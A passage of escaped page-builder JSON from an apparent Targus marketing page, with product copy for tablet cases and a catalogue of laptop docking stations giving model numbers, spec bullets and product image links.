src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/files\\/safeguard-your-valuables-safeport-rugged-ipad-case_300x300.jpg?v=1556613126\\\" alt=\\\"safeport rugged ipad case\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"24999da\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":71.622},\"elements\":[{\"id\":\"d8d0705\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 class=\\\"h3\\\"><span style=\\\"color: #000000;\\\">Safeguard Your Valuables<\\/span><\\/h2><div class=\\\"rte-setting\\\"><p>At Targus, protecting your devices is our top priority. Tablets are easily secured with our premium collection of iPad cases and other\\u00a0tablet cases\\u00a0- including\\u00a0Field-Ready\\u00a0and\\u00a0Rugged\\u00a0options for outdoor and industrial environments. We even have laptop backpacks with hidden zippered pockets and purpose-built compartments for your keys, phone, and other personal belongings.<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8e49670\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1304992\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"22f0297\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"869e28f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#f9f9f9\"},\"elements\":[{\"id\":\"554d7a4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":64.324,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"2ddae80\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 class=\\\"h3\\\"><span style=\\\"color: #000000;\\\">Expand Your Potential<\\/span><\\/h2><div class=\\\"rte-setting\\\"><p>At Targus, we\\u2019re about much more than just laptop backpacks. Our docking stations offer the convenience of universal connections, providing compatibility with multiple brands including Apple (Mac), Dell, Lenovo, HP, Acer, and Asus. This enables you to quickly plug in and connect at your home office, workstation, or on the road. Give your laptop wings as you easily connect to PC accessories like external monitors, speakers, keyboard\\/mice, and laptop chargers.<\\/p><p>4K docking stations\\u00a0are the perfect companion for media and design creatives, offering a quality four times that of 1080P high-definition. Our\\u00a0dual display universal docking stations hook up to two monitors for accelerated productivity and ease of transition between documents. You can find all the cables, adapters, and storage trays you need in our collection of docking station accessories.<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ab11fdc\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":35.676},\"elements\":[{\"id\":\"5677e5f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"alignleft\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/files\\/expand-your-potential-dock520usz-quad-docking-station_300x300.jpg?v=1556613316\\\" alt=\\\"expand your potential dock quad docking station\\\" width=\\\"519\\\" height=\\\"348\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bfcf376\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e6a7498\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"76d9e25\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9bceb31\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6ba22f6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"820d50e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Docking Stations\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#0c0c0c\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5abbfc0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"b0cb8c5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"83d2369\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div id=\\\"pdp-image-gallery\\\"><div class=\\\"MagicToolboxContainer layout-bottom thumbnail-size-small\\\"><h3 style=\\\"text-align: center;\\\"><strong>USB-C\\u2122 Universal QUAD HD (QVHD) Docking Station<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK520USZ)<\\/p><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ec5cce0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e58be5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>USB-C\\u2122 Universal DV4K Docking Station with 100W Power<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK190AP)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"20620af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7e6c96e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Thunderbolt\\u2122 3 DV4K Docking Station with Power<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK220AP)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2be6e51\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"14dc97e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0ea999f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/DOCK520USZ_MAIN1_1024x1024.png?v=1558464095\\\" width=\\\"222\\\" height=\\\"222\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7ebdbda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7adb02b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/0042963_usb-c-universal-dv4k-docking-station-with-100w-power_grande.jpg?v=1543989907\\\" alt=\\\"USB-C\\u2122 Universal DV4K Docking Station with 100W Power\\\" width=\\\"210\\\" height=\\\"210\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dbfcd36\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e79c632\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/Dock220_grande.jpg?v=1553684715\\\" alt=\\\"Thunderbolt\\u2122 3 DV4K Docking Station with Power\\\" width=\\\"214\\\" height=\\\"214\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"535b089\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"c25718e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"65bbbfa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Supports four HD (1920 x 1080 p60) displays or two 2K (2560 x 1440 p50) displays via 4 HDMI ports<\\/li><li>Thunderbolt\\u2122 3 compatible<\\/li><li>1 USB-C 3.0 Port with power (15W non-PD)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f9e3262\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abcb033\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Supports dual 4K Ultra HD monitor video via 2 DisplayPort\\u2122 (DP 1.2a) and 2 HDMI (HDMI 2.0) ports<\\/li><li>Power Delivery up to 100W<\\/li><li>Thunderbolt\\u2122 3 compatible<\\/li><li>1 USB-C USB 3.1 Gen 1 device port<\\/li><li>Includes 1-meter USB-C to C host cable (detachable) and 1 standard lock slot<\\/li><li>Power tips included to power Acer\\u00ae, ASUS\\u00ae, Compaq\\u00ae, Dell\\u2122, Fujitsu\\u00ae, Gateway\\u00ae, HP\\u00ae, IBM\\/Lenovo\\u2122, and Toshiba<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e01d2bb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b0ddb0f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>0.5M passive 40G, 5A cable (C\\/M to C\\/M)<\\/li><li>Cable lock slot<\\/li><li>Power Delivery 2.0 up to 85W<\\/li><li>Supports dual-display<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e7b761\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1a06dba\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a805784\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"84a363f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"316cffa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c570e8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1673a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6a345f9\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"b55e07f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"112d0b9\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1491c5c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"c1325c6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0c537db\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div id=\\\"pdp-image-gallery\\\"><div class=\\\"MagicToolboxContainer layout-bottom thumbnail-size-small\\\"><h3 style=\\\"text-align: center;\\\"><strong>Universal USB 3.0 DV Docking Station with Power<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK171)<\\/p><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a45b98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"80b3cd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Universal USB 3.0 DV4K Docking Station with Power<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK177)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"da54caa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"05b138b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Universal USB 3.0 DV4K Docking Station<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK160AP)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e1c8e0b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"1aa8cc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec212c2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/ACP71USZ_grande.png?v=1551118350\\\" alt=\\\"Universal USB 3.0 DV Docking Station with Power\\\" width=\\\"197\\\" height=\\\"197\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a2463c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2bb069e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/0027659_universal-usb-30-dv4k-docking-station-with-power_grande.jpg?v=1543990156\\\" alt=\\\"Universal USB 3.0 DV4K Docking Station with Power\\\" width=\\\"205\\\" height=\\\"205\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d8676ca\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b6b9ca8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/dock160usz_grande.png?v=1554473002\\\" alt=\\\"Universal USB 3.0 DV4K Docking Station\\\" width=\\\"205\\\" height=\\\"205\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5008081\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"c1814d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d78e228\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Dual 2048 x 1152 at 60Hz 24 bpp color video (single 2K 2560 x 1440 at 50Hz HDMI) leveraging the DisplayLink DL-3900 technology<\\/li><li>19VDC PC laptop power and charging up to 90W<\\/li><li>Removable standalone power and charging tip compartment<\\/li><li>Integrated lock slot accommodates industry-standard security locks<\\/li><li>Wedge design for laptop mounting<\\/li><li>Includes detachable 1-meter USB \\u00b5B to A host cable<\\/li><li>Includes 120W AC adapter and power connected purple LED light<\\/li><li>Includes detachable 1-meter DC host power and charging cable<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d409cb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"362fae6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Dual DisplayPort 1.2++ (with MST), dual HDMI 2.0, or one of each external monitor port<\\/li><li>19VDC PC laptop power and charging up to 90W<\\/li><li>Removable standalone tip compartment<\\/li><li>Integrated lock slot accommodates industry-standard security locks<\\/li><li>Wedge design for laptop mounting<\\/li><li>Includes detachable 1-meter USB 3.0 uB to A host cable<\\/li><li>Includes 120W AC adapter and power connected purple LED light<\\/li><li>Includes detachable 1-meter DC host power and charging cable<\\/li><li>Dual 4K2K up to 4096x2160 60Hz (p60) 24 bpp color video monitor support leveraging the DisplayLink DL-6950 chipset<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d550746\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"80f7e0c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Dual DisplayPort (DP 1.2a) or Dual HDMI (HDMI 2.0) video or one of each<\\/li><li>Dual 4K Ultra HD video 4096x2160 60Hz (p60) 24 bpp with 6-Channel (5.1) Audio<\\/li><li>1 USB-C device port (USB 3.0 5Gbps data only)<\\/li><li>1 Gigabit Ethernet port for wired connectivity<\\/li><li>4 USB 3.0 ports for the latest peripherals (1 BC1.2 fast device-charging port)<\\/li><li>1 3.5mm combo Audio In\\/Out port for mics, speakers, and earphones<\\/li><li>Includes 1-meter USB-\\u00b5B\\/M to A\\/M cable (detachable)<\\/li><li>Ergonomic wedge design for comfortable typing<\\/li><li>Integrated lock slot accommodates standard industry-security locks to safeguard equipment<\\/li><li>Universal compatibility with the majority of laptop and PC tablet brands and platforms<\\/li><li>Includes 45W AC adapter<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"057d62b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"cb49182\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6f3b6b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c43a02c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4105e5d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"45a2c58\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"509b46a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5955103\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"52af851\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1e9b1c2\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5df361e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"5b30a76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6341b4c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div id=\\\"pdp-image-gallery\\\"><div class=\\\"MagicToolboxContainer layout-bottom thumbnail-size-small\\\"><h3 style=\\\"text-align: center;\\\"><strong>USB-C Universal DV4K Docking Station with Power<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK180AP)<\\/p><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3ccec06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"133d383\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>USB-C Universal Docking Station<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK410AP)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17782db\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ba6eb9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>2K Universal Docking Station<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK120AP)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2528fe1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"c82277a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7648653\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/0030076_usb-c-universal-dv4k-docking-station-with-power_grande.jpg?v=1544442889\\\" alt=\\\"USB-C Universal DV4K Docking Station with Power\\\" width=\\\"234\\\" height=\\\"234\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e22637e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"142bf79\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/www.targus.com\\/content\\/images\\/thumbs\\/0041279_usb-c-universal-docking-station-black.jpeg\\\" width=\\\"236\\\" height=\\\"236\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3eac094\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8261346\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/DOCK120USZ_ACP120US_50_MAIN-ALT2_grande.png?v=1549657702\\\" alt=\\\"2K Universal Docking Station\\\" width=\\\"238\\\" height=\\\"238\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"58c2b8c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"b8fee76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97b7a35\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>2 DisplayPort (DP 1.2a) and 2 HDMI (HDMI 2.0) port support dual 4k Ultra HD monitors<\\/li><li>Power Delivery 2.0 provides up to 60W charging<\\/li><li>Thunderbolt\\u2122 3 compatible<\\/li><li>1 USB-C device port (USB 3.0 data only)<\\/li><li>1 Gigabit Ethernet port for secure, wire speed Ethernet access<\\/li><li>4 USB 3.0 ports for the latest peripherals (1 fast device-charging port)<\\/li><li>Includes 1-meter USB-C to C host cable (detachable)<\\/li><li>1 3.5mm combo Audio In\\/Out for mics, speakers, and earphones<\\/li><li>2 DisplayPort (DP 1.2a) and 2 HDMI (HDMI 2.0) ports support dual 4K Ultra HD monitors<\\/li><li>Ergonomic wedge design for comfortable typing<\\/li><li>Integrated lock slot accommodates industry-standard security locks<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5e0b083\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"079e079\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>1 Gigabit Ethernet Port for wired access at ultra-fast speeds<\\/li><li>Ergonomic wedge design for comfortable typing<\\/li><li>Integrated lock slot accommodates standard security locks to safeguard equipment<\\/li><li>Universal compatibility with popular laptop and PC tablet brands and operating systems<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e5dec57\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7263a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>1 Audio In\\/Out port for mics, speakers and earphones<\\/li><li>1 DVI-I and 1 HDMI port supports dual monitors (up to 2048 x 1152 x 60 fps)<\\/li><li>1 Gigabit Ethernet port for wired access at ultra-fast speeds<\\/li><li>3 USB 3.0 SuperSpeed ports for the latest peripherals<\\/li><li>1 USB 3.0 powered port for fast device charging<\\/li><li>Integrated Lock Slot accommodates security locks to safeguard equipment<\\/li><li>Universal compatibility with popular brands and operating systems<\\/li><li>1 DisplayPort port supports a single 2K monitor (up to 2560 x 1600 x 30 fps)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9047438\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"9064b56\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3a7aa27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bf24fa2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c4ea1e8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f009791\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"789ec09\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"da4ffea\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"280bef3\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c1f4b06\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"14ef8dc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"60548a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b553fd8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div id=\\\"pdp-image-gallery\\\"><div class=\\\"MagicToolboxContainer layout-bottom thumbnail-size-small\\\"><h3 style=\\\"text-align: center;\\\"><strong>VersaLink Universal Dual Video Travel Dock<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK110AP)<\\/p><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"531cd10\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a984a69\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>USB-C DisplayPort\\u2122 Alt-Mode Travel Dock<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK411)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"929416d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4b4a72e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>USB-C Alt-Mode Travel Dock w\\/ PD<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK412AP)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aad7e09\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"e8e16dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"933977a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/dock110usz_grande.jpg?v=1553684661\\\" alt=\\\"VersaLink Universal Dual Video Travel Dock\\\" width=\\\"259\\\" height=\\\"180\\\" 